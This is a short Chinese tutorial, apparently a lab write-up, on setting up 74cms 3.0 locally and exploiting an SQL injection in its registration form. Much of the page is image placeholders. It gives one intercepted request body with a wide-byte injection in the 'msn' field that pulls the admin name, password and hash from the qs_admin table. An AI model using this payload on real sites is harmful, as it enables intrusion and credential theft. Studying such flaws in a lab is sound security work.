74cms3.0安装以及cmsSQL注入漏洞详解

 下载解压到www目录并开启低版本PHP服务

访问

http://127.0.0.1/74cms3.0/install/index.php

 Error:Can‘t select MySQL database(74cms3.0)!问题解决

74cms3.0安装以及cmsSQL注入漏洞详解_第1张图片

和我一样就无脑确定

74cms3.0安装以及cmsSQL注入漏洞详解_第2张图片

  按照提示配置,不知道填啥就写root,邮箱随便写一个@qq.com之类的

74cms3.0安装以及cmsSQL注入漏洞详解_第3张图片

 后台(可略过)

74cms3.0安装以及cmsSQL注入漏洞详解_第4张图片

 74cms3.0安装以及cmsSQL注入漏洞详解_第5张图片

 前台

注册

74cms3.0安装以及cmsSQL注入漏洞详解_第6张图片

74cms3.0安装以及cmsSQL注入漏洞详解_第7张图片

74cms3.0安装以及cmsSQL注入漏洞详解_第8张图片

burpsuite抓包修改

realname=%B5%C8%D6%B0%EDE&sex=%C4%D0&birthday=1999-01-01&addresses=%BA%D3%C4%CF%BA%D3%C4%CF%D6%A3%D6%DD&mobile=&phone=17640366942&qq=15017777&msn=ha%df',profile=(select concat(admin_name,pwd,pwd_hash)from qs_admin)#&Submit=%B1%A3%B4%E6

74cms3.0安装以及cmsSQL注入漏洞详解_第9张图片

 有返回74cms3.0安装以及cmsSQL注入漏洞详解_第10张图片

 以下原因是由于PHP版本过低,

74cms3.0安装以及cmsSQL注入漏洞详解_第11张图片 74cms3.0安装以及cmsSQL注入漏洞详解_第12张图片

你可能感兴趣的:(演武场,已有的事后必再有,mysql,php,数据库,经验分享,web安全)